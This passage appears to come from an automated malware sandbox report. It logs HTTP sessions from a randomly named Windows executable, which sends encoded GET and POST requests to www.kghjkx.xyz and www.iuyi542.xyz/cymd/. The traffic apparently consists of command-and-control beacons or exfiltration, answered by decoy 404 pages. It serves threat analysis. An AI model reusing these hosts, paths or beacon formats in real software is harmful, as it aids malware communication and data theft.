Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	47.129.103.185	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:34.073201895 CET	531	OUT	GET /usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.kghjkx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:33:34.923799038 CET	549	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 11 Nov 2024 07:33:34 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kghjkx.xyz/usop/?Ir8HUj=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&gRU0e=jXFT04FhvBZ8j0BP Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50039	38.47.237.27	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:40.233179092 CET	787	OUT	POST /cymd/ HTTP/1.1 Host: www.iuyi542.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.iuyi542.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.iuyi542.xyz/cymd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 66 53 35 35 43 43 33 45 68 38 76 66 37 51 50 78 34 56 75 37 59 78 76 74 59 68 56 54 6f 47 51 6b 54 46 30 44 66 78 77 37 45 2b 33 74 65 35 33 70 46 31 48 45 4c 59 43 74 58 67 67 4e 77 67 70 46 54 59 6c 49 38 6d 56 32 4b 33 4b 4e 41 32 45 7a 57 5a 73 64 6a 6b 79 6d 58 50 51 42 63 4e 73 46 47 52 41 67 55 6c 48 35 72 58 63 68 41 30 54 79 63 6a 62 44 67 48 44 39 52 4f 4d 65 45 45 59 5a 39 6e 47 38 33 56 74 70 46 51 48 59 45 45 69 4f 44 6e 2b 4a 68 6a 33 69 6b 6b 69 30 74 6e 73 32 4d 61 71 79 4c 70 6c 68 4d 4b 6a 36 33 44 7a 61 52 58 63 41 4f 69 47 70 38 79 72 4f 68 71 66 6f 6c 41 3d 3d Data Ascii: Ir8HUj=fS55CC3Eh8vf7QPx4Vu7YxvtYhVToGQkTF0Dfxw7E+3te53pF1HELYCtXggNwgpFTYlI8mV2K3KNA2EzWZsdjkymXPQBcNsFGRAgUlH5rXchA0TycjbDgHD9ROMeEEYZ9nG83VtpFQHYEEiODn+Jhj3ikki0tns2MaqyLplhMKj63DzaRXcAOiGp8yrOhqfolA==
Nov 11, 2024 08:33:40.749520063 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:40 GMT Content-Type: text/html Content-Length: 167433 Connection: close ETag: "652641ca-28e09"
Nov 11, 2024 08:33:40.749603987 CET	1236	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
Nov 11, 2024 08:33:40.749608994 CET	212	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
Nov 11, 2024 08:33:40.749727964 CET	1236	IN	Data Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
Nov 11, 2024 08:33:40.749733925 CET	212	IN	Data Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
Nov 11, 2024 08:33:40.749845028 CET	1236	IN	Data Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
Nov 11, 2024 08:33:40.749850035 CET	212	IN	Data Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
Nov 11, 2024 08:33:40.750034094 CET	1236	IN	Data Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
Nov 11, 2024 08:33:40.750068903 CET	212	IN	Data Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
Nov 11, 2024 08:33:40.750205994 CET	1236	IN	Data Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
Nov 11, 2024 08:33:40.754585981 CET	1236	IN	Data Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50040	38.47.237.27	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:42.785239935 CET	807	OUT	POST /cymd/ HTTP/1.1 Host: www.iuyi542.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.iuyi542.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.iuyi542.xyz/cymd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 66 53 35 35 43 43 33 45 68 38 76 66 36 78 2f 78 6a 79 61 37 50 42 76 69 58 42 56 54 78 57 51 67 54 46 34 44 66 77 30 72 45 73 44 74 65 5a 48 70 45 30 48 45 49 59 43 74 50 51 67 45 30 67 6f 4a 54 59 68 71 38 6b 52 32 4b 7a 69 4e 41 32 55 7a 57 71 55 65 73 55 79 6b 63 76 51 35 43 39 73 46 47 52 41 67 55 6c 54 66 72 57 34 68 41 6b 6a 79 64 42 6a 43 6d 33 44 79 62 75 4d 65 57 30 59 56 39 6e 47 65 33 55 68 50 46 53 2f 59 45 42 4f 4f 44 32 2b 57 72 6a 32 6e 71 45 6a 30 38 6b 4a 63 55 62 6a 36 55 49 70 75 50 35 33 32 37 6c 2b 41 41 6d 39 58 63 69 69 61 68 31 69 36 73 70 69 68 2b 4e 41 45 37 65 48 71 63 68 79 73 46 4f 4b 57 56 36 32 53 66 38 77 3d Data Ascii: Ir8HUj=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsDteZHpE0HEIYCtPQgE0goJTYhq8kR2KziNA2UzWqUesUykcvQ5C9sFGRAgUlTfrW4hAkjydBjCm3DybuMeW0YV9nGe3UhPFS/YEBOOD2+Wrj2nqEj08kJcUbj6UIpuP5327l+AAm9Xciiah1i6spih+NAE7eHqchysFOKWV62Sf8w=
Nov 11, 2024 08:33:43.291893959 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:43 GMT Content-Type: text/html Content-Length: 167433 Connection: close ETag: "652641ca-28e09"
Nov 11, 2024 08:33:43.291917086 CET	1236	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
Nov 11, 2024 08:33:43.291927099 CET	212	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
Nov 11, 2024 08:33:43.291974068 CET	1236	IN	Data Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
Nov 11, 2024 08:33:43.292011023 CET	212	IN	Data Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
Nov 11, 2024 08:33:43.292093992 CET	1236	IN	Data Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
Nov 11, 2024 08:33:43.292155027 CET	212	IN	Data Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
Nov 11, 2024 08:33:43.292258024 CET	1236	IN	Data Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 Data Ascii: l;line-height:inherit}dl,ol,ul{margin-top:0;margin-bottom:1rem}ol ol,ol ul,ul ol,ul ul{margin-bottom:0}dt{font-weight:700}dd{margin-bottom:.5rem;margin-left:0}blockquote{margin:0 0 1rem}dfn{font-style:italic}b,strong{font-weight:bolder}small{f
Nov 11, 2024 08:33:43.292294025 CET	212	IN	Data Raw: 6f 6d 3a 2e 35 72 65 6d 7d 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 3a 35 70 78 20 61 75 74 6f 20 2d Data Ascii: om:.5rem}button{border-radius:0}button:focus{outline:1px dotted;outline:5px auto -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}b
Nov 11, 2024 08:33:43.292431116 CET	1236	IN	Data Raw: 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d Data Ascii: utton,input{overflow:visible}button,select{text-transform:none}[type=reset],[type=submit],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner,button
Nov 11, 2024 08:33:43.297154903 CET	1236	IN	Data Raw: 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 68 31 Data Ascii: bottom:.5rem;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25re

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50041	38.47.237.27	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:45.325675011 CET	10889	OUT	POST /cymd/ HTTP/1.1 Host: www.iuyi542.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.iuyi542.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.iuyi542.xyz/cymd/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 66 53 35 35 43 43 33 45 68 38 76 66 36 78 2f 78 6a 79 61 37 50 42 76 69 58 42 56 54 78 57 51 67 54 46 34 44 66 77 30 72 45 73 62 74 65 72 50 70 4c 33 66 45 4a 59 43 74 52 67 67 42 30 67 70 54 54 5a 46 75 38 6b 64 49 4b 31 6d 4e 44 56 73 7a 51 62 55 65 33 6b 79 6b 54 50 51 43 63 4e 73 4d 47 52 77 73 55 6c 44 66 72 57 34 68 41 6d 37 79 55 7a 62 43 6b 33 44 39 52 4f 4d 73 45 45 5a 49 39 6e 65 30 33 55 30 30 45 68 33 59 45 67 69 4f 46 45 57 57 32 7a 32 6c 70 45 6a 61 38 6b 31 48 55 66 4c 63 55 4a 73 44 50 34 50 32 71 54 44 61 54 31 35 44 66 68 4b 49 37 31 2b 2b 31 37 69 79 35 50 30 6f 72 39 50 45 4a 53 76 42 43 63 37 39 51 36 47 4e 4d 49 49 64 43 7a 73 41 77 34 67 4e 68 7a 57 62 6b 37 4d 53 71 4b 31 4d 2f 4f 70 30 5a 49 67 6d 45 6e 38 4c 37 6b 37 79 49 33 69 5a 65 45 59 61 4f 51 30 33 32 43 2f 70 65 32 4b 46 30 56 30 76 6b 6b 2b 35 37 51 49 66 39 7a 7a 54 7a 36 56 63 51 78 78 2f 4b 35 52 77 73 39 47 34 4d 41 6f 49 2b 65 48 6a 56 71 30 31 4a 36 42 73 4d 50 64 46 64 73 6c 75 41 41 38 [TRUNCATED] Data Ascii: Ir8HUj=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsbterPpL3fEJYCtRggB0gpTTZFu8kdIK1mNDVszQbUe3kykTPQCcNsMGRwsUlDfrW4hAm7yUzbCk3D9ROMsEEZI9ne03U00Eh3YEgiOFEWW2z2lpEja8k1HUfLcUJsDP4P2qTDaT15DfhKI71++17iy5P0or9PEJSvBCc79Q6GNMIIdCzsAw4gNhzWbk7MSqK1M/Op0ZIgmEn8L7k7yI3iZeEYaOQ032C/pe2KF0V0vkk+57QIf9zzTz6VcQxx/K5Rws9G4MAoI+eHjVq01J6BsMPdFdsluAA8vsTSbR59qYAu7ccj09Q1d/ZTySX4PazeTwUID0jXwThWDUvluDjYBjDX90i+xfeYlQrdmTX3cpjl+uH5GWhDiDTzQb97aX1Pc8oryggoALLRUk1cPt8cIPsluHKQpH9DBhvS/or+Rj2UN2hli4slZYV/DJe9clAjsHN+nd79fSNPB9P5MEaGAX3x1fIwceYsBZdSOdNo2yhVk8X0hV4wCsS9QzUipEdHEhuU5eH0xeTk7tywHmPrwNEhRvYrs64UyDUMDOMohLQ7hnvCMbk3PPYwRDSHULEnXj6/orVnKp1q72dQRidMy13Cnci7ndOYNwRJFTlgM8Vrgahfmax8wreNaOZ71kbpJnlwqoAN81XynrrE14Mh3/uZpkIg2VfoBDh0oRoSUSF5keNgtr3RhO7LGxWv4FgTHeR3wwDTPIoJ2zrvTLmR+stxHtkVK0OuTDLE6xDdElQ/lQZaept/DWXOsS9iUsXKwWZa7zV01TJcAoV0gDNbWEo2dDOZA7DDG/oojEOV3LylD4pgVvidyW6ExkRnezi+4WYMj7f4CZ6Ey/B+2TJCKkMvyV3YrjFuFg1Ac2f9C2ya4kAwGe7CqjOPVLE69euVsXJ5UZFzzaICrHoeyCEwf1VNb5xJPg5QEKdW7tJWghNaLE3AXnNFwZ3CJAsoQCrPfj [TRUNCATED]
Nov 11, 2024 08:33:45.837225914 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 07:33:45 GMT Content-Type: text/html Content-Length: 167433 Connection: close ETag: "652641ca-28e09"
Nov 11, 2024 08:33:45.837236881 CET	1236	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
Nov 11, 2024 08:33:45.837248087 CET	212	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
Nov 11, 2024 08:33:45.837280035 CET	1236	IN	Data Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
Nov 11, 2024 08:33:45.837285042 CET	212	IN	Data Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
